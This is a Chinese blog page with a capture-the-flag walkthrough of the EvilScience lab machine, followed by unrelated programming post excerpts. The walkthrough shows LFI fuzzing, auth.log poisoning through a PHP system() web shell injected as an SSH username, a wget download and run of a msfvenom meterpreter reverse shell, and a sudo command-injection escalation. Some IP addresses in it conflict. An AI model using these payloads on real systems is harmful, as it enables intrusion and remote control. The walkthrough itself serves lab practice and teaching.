当前位置：首页 > news >正文

EvilScience靶机详解

news 2025/11/7 15:51:32

主机发现

arp-scan -l

得到靶机ip

192.168.229.152

端口扫描

nmap -sV -A -T4 192.168.1.20

这段代码使用 nmap 命令来扫描目标主机 192.168.1.20，并执行以下操作：-sV：探测开放的端口，以确定服务/版本信息。-A：启用操作系统探测、版本探测、脚本扫描和跟踪路由。-T4：设置时间模板，用于平衡速度和准确性。当运行这段代码时，nmap 将扫描目标主机，并尝试确定开放的端口及其对应的服务和版本信息。它还会执行一些额外的操作，如操作系统探测和跟踪路由。输出结果将显示目标主机的详细信息，包括开放的端口、服务、版本等。

发现80和22端口是开放的，分别是ssh和http服务

服务网站

http://192.168.229.152/

存在本地文件包含，找到一个邮箱，可能有用

http://192.168.229.152/index.php?file=about.php

漏洞利用

下载 LFI-JHADDIX.txt（字典）

https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt

burpsuite抓包

发送intuder爆破

复制url访问页面

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2flog%2flastlog

没什么有用的信息

http://192.168.229.152/index.php?file=%2fvar%2frun%2futmp

此处存在url跳转注意一下

http://192.168.229.152/index.php?file=%2fvar%2flog%2fauth%2elog

下面包含其他文件的结果

http://192.168.229.152/index.php?file=/etc/passwd

查看history

curl -is 192.168.229.152/index.php?file=/var/log/auth.og

之后的步骤建议在此处打快照

ssh @root192.168.229.152

此处输错密码会有错误日志存储，所以可以尝试注入

注入后发现用户名被隐藏

ssh '<?php system($_GET[cmd]);?>'@192.168.229.152

msf监听

写入一句话木马

curl -is 'http://192.168.229.152/index.php?file=/var/log/auth.log&cmd=ls'

msf生成木马

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.229.141 LPORT

将生成的木马放入本机免杀盘，在文件处开启http服务

python -m http.server

通过浏览器上传一句话木马

http://192.168.229.152/index.php?file=var/log/auth.log&d1no=system(%27wget+192.168.110.17:7878/shell.elf%27)%3b

http://192.168.229.152/index.php?file=/var/log/auth.log&d1no=system(%27chmod+%2bx+shell.elf%27)%3b

?file=/var/log/auth.log&d1no=system('./shell.elf')%3b

kali开启监听

msfconsole
use exploit/multi/handler 
set payload linux/x86/meterpreter/reverse_tcp
set lport 5757
set lhost 192.168.229.141
run

监听成功

进入交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

查看免密操作

sudo -l

sudo ./xxxlogauditorxxx.py

/var/log/auth.log | whoami

EvilScience靶机详解

主机发现 arp-scan -l 得到靶机ip 192.168.229.152 端口扫描 nmap -sV -A -T4 192.168.1.20 这段代码使用 nmap 命令来扫描目标主机 192.168.1.20，并执行以下操作：-sV：探测开放的端口，以确定服务/版本信息。-A：启…...

编程日记 2024/9/23 12:09:38

算法练习题24——leetcode3296移山所需的最小秒数（二分模拟）

【题目描述】【代码示例（java）】 class Solution {// 计算让工人们将山的高度降到0所需的最少时间public long minNumberOfSeconds(int mountainHeight, int[] workerTimes) {long left 0; // 最少时间初始为0long right 0; // 最大时间初始化为0// …...

编程日记 2024/9/23 12:07:35

excel 单元格一直显示年月日

excel 单元格一直显示年月日，在单元格上右键选择单元格格式，选择日期时单元格会显示成日期格式...

编程日记 2024/9/23 12:06:32

【线程】线程的控制

本文重点：理解线程控制的接口前言内核中是没有很明确线程的概念的，只有轻量级进程的概念，不会提供直接给我们线程的系统调用，而会给我们提供轻量级进程的系统调用。我们用户是需要线程的接口的，在应用层&#xff0…...

编程日记 2024/9/23 12:03:29

掌握 Spring：从新手到高手的常见问题汇总

一提起Spring，总感觉有太多知识，无法详尽，有些基础理解就先不说了，相信大家都已经用过Spring了下面简单针对常见Spring面试题做些回答核心特性 IOC容器spring事件资源管理国际化校验数据绑定类型转换spirng表达式面向切面编程……...

编程日记 2024/9/23 12:02:28

机器学习——Bagging

Bagging： 方法：集成n个base learner模型，每个模型都对原始数据集进行有放回的随机采样获得随机数据集，然后并行训练。回归问题：n个base模型进行预测，将得到的预测值取平均得到最终结果。分类问题&#xf…...

编程日记 2024/9/23 11:59:26

日志体系结构与框架：历史、实现与如何在 Spring Cloud 中使用日志体系

文章目录 1. 引言2. 日志体系结构3. 日志框架的发展历程日志框架特点对比 4. 日志记录器的使用与管理使用 SLF4J 和 Logback 的日志记录示例 5. Spring Cloud 中的日志使用5.1 日志框架集成5.2 分布式追踪：Spring Cloud Sleuth 和 Zipkin添加 Sleuth 和 Zipkin 依赖…...

编程日记 2024/9/23 11:55:22

图文深入理解SQL语句的执行过程

List item 本文将深入介绍SQL语句的执行过程。一.在RDBMS（关系型DB）中，看似很简单的一条已写入DB内存的SQL语句执行过程却非常复杂，也就是说，你执行了一条诸如select count(*) where id 001 from table_name的非常简…...

编程日记 2024/9/23 11:53:19

安装boost 下面展示一些内联代码片。 sudo apt install libboost-all-dev -y安装libmongoc-1.0 链接: link // An highlighted block sudo apt install libmongoc-1.0-0 sudo apt install libbson-1.0 sudo apt install cmake libssl-dev libsasl2-dev编译源码 $ git clone…...

编程日记 2024/9/23 11:49:14

学习篇 | Jupyter 使用（notebook hub）

1. JupyterHub 1.1 快速尝试 jupyterhub -f/path/jupyter_config.py --no-ssl1.2 长期后台运行 bash -c "nohup jupyterhub -f/path/jupyter_config.py --no-ssl" > ~/jupyterhub.log 2>&1 &1.3 帮助 jupyterhub --help2. Jupyter Notebook 2.1 快…...

编程日记 2024/9/23 11:46:10

【裸机装机系列】8.kali(ubuntu)-虚拟内存swap交换分区扩展

推荐阅读： 1.kali(ubuntu)-为什么弃用ubuntu，而选择基于debian的kali操作系统 linux swap交换分区，相当于win系统虚拟内存的概念。当linux系统的物理内存不够用的时候，就需要将物理内存中的一部分空间释放出来，以供当前…...

编程日记 2024/9/23 11:45:08

异步请求的方法以及原理

异步请求是指在发送请求后，不会阻塞程序的执行，而是继续执行后续的代码，等待请求返回后再执行相应的回调函数。常见的异步请求方法包括使用XMLHttpRequest对象（XHR）和fetch API。异步请求的方法 1. XMLHttpRequest (X…...

编程日记 2024/9/23 11:40:02

SpringCloud入门（六）Nacos注册中心（下）

一、Nacos环境隔离 Nacos提供了namespace来实现环境隔离功能。 nacos中可以有多个namespace。namespace下可以有group、service等。不同namespace之间相互隔离，例如不同namespace的服务互相不可见。使用Nacos Namespace 环境隔离步骤： 1.在Nacos控制…...

编程日记 2024/9/23 11:37:58

【RDMA】mlxlink检查和调试连接状态及相关问题--驱动工具

简介 mlxlink工具用于检查和调试连接状态及相关问题。该工具可以用于不同的链路和电缆（包括被动、电动、收发器和背板）。属于mft工具套件的一个工具，固件工具 Firmware Tools (MFT):https://blog.csdn.net/bandaoyu/article/details/14242…...

编程日记 2024/9/23 11:36:57

QT For Android开发-打开PPT文件

一、前言需求： Qt开发Android程序过程中，点击按钮就打开一个PPT文件。 Qt在Windows上要打开PPT文件或者其他文件很容易。可以使用QDesktopServices打开文件，非常方便。QDesktopServices提供了静态接口调用系统级别的功能。这里用的QDesk…...

编程日记 2024/9/23 11:35:56

SpringBoot教程（三十） | SpringBoot集成Shiro权限框架

SpringBoot教程（三十） | SpringBoot集成Shiro权限框架一、什么是Shiro二、Shiro 组件核心组件其他组件三、流程说明shiro的运行流程四、SpringBoot 集成 Shiro （shiro-spring-boot-web-starter方式）1. 添加 Shiro 相关 maven2…...

编程日记 2024/9/23 11:34:55

[ffmpeg] 视频格式转换

本文主要梳理 ffmpeg 中的视频格式转换。由于上屏的数据是 rgba，编码使用的是 yuv数据，所以经常会使用到视频格式的转换。除了使用 ffmpeg进行转换，还可以通过 libyuv 和 directX 写 shader 进行转换。之前看到文章说 libyuv 之前是 ffmpeg…...

编程日记 2024/9/23 11:33:53

git-repo系列教程(3) git-repo https证书认证问题

文章目录问题描述解决步骤1.下载证书2.测试证书是否正常3.设置环境变量总结问题描述在使用git repo 同步仓库时,发现不能同步,出现如下提示错误: % Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left …...

编程日记 2024/9/23 11:29:49

中序遍历二叉树全过程图解

文章目录中序遍历图解总结拓展：回归与回溯中序遍历图解首先看下中序遍历的代码，其接受一个根结点root作为参数，判断根节点是否为nil，不为nil则先递归遍历左子树。 func traversal(root *TreeNode,res *[]int) {if root nil …...

编程日记 2024/9/23 11:28:47

设计模式组合模式（Composite Pattern）

组合模式简绍组合模式（Composite Pattern）是一种结构型设计模式，它允许你将对象组合成树形结构来表示“部分-整体”的层次结构。组合模式使得客户端可以用一致的方式处理单个对象和组合对象。这样，可以在不知道对象具体类型的条…...

编程日记 2024/9/23 11:25:36

Prompt Tuning、P-Tuning、Prefix Tuning的区别

一、Prompt Tuning、P-Tuning、Prefix Tuning的区别 1. Prompt Tuning（提示调优）核心思想：固定预训练模型参数，仅学习额外的连续提示向量（通常是嵌入层的一部分）。实现方式：在输入文本前添加可训练的连续向量（软提示），模型只更新这些提示参数。优势：参数量少（仅提…...

编程新知 2025/11/6 22:37:44

【机器视觉】单目测距——运动结构恢复

ps：图是随便找的，为了凑个封面前言在前面对光流法进行进一步改进，希望将2D光流推广至3D场景流时，发现2D转3D过程中存在尺度歧义问题，需要补全摄像头拍摄图像中缺失的深度信息，否则解空间不收敛&#xf…...

编程新知 2025/10/27 13:23:12

vue3 定时器-定义全局方法 vue+ts

1.创建ts文件路径：src/utils/timer.ts 完整代码： import { onUnmounted } from vuetype TimerCallback (...args: any[]) > voidexport function useGlobalTimer() {const timers: Map<number, NodeJS.Timeout> new Map()// 创建定时器con…...

编程新知 2025/8/9 0:31:20

C++ Visual Studio 2017厂商给的源码没有.sln文件易兆微芯片下载工具加开机动画下载。

1.先用Visual Studio 2017打开Yichip YC31xx loader.vcxproj，再用Visual Studio 2022打开。再保侟就有.sln文件了。易兆微芯片下载工具加开机动画下载 ExtraDownloadFile1Info.\logo.bin|0|0|10D2000|0 MFC应用兼容CMD 在BOOL CYichipYC31xxloaderDlg::OnIni…...

编程新知 2025/11/2 8:56:14

Rapidio门铃消息FIFO溢出机制

关于RapidIO门铃消息FIFO的溢出机制及其与中断抖动的关系，以下是深入解析： 门铃FIFO溢出的本质在RapidIO系统中，门铃消息FIFO是硬件控制器内部的缓冲区，用于临时存储接收到的门铃消息（Doorbell Message）。…...

编程新知 2025/11/2 0:32:25

Java多线程实现之Thread类深度解析

Java多线程实现之Thread类深度解析一、多线程基础概念1.1 什么是线程1.2 多线程的优势1.3 Java多线程模型二、Thread类的基本结构与构造函数2.1 Thread类的继承关系2.2 构造函数三、创建和启动线程3.1 继承Thread类创建线程3.2 实现Runnable接口创建线程四、Thread类的核心…...

编程新知 2025/8/28 21:52:02

初学 pytest 记录

安装 pip install pytest用例可以是函数也可以是类中的方法 def test_func():print()class TestAdd: # def __init__(self): 在 pytest 中不可以使用__init__方法 # self.cc 12345 pytest.mark.api def test_str(self):res add(1, 2)assert res 12def test_int(self):r…...

编程新知 2025/11/2 6:24:51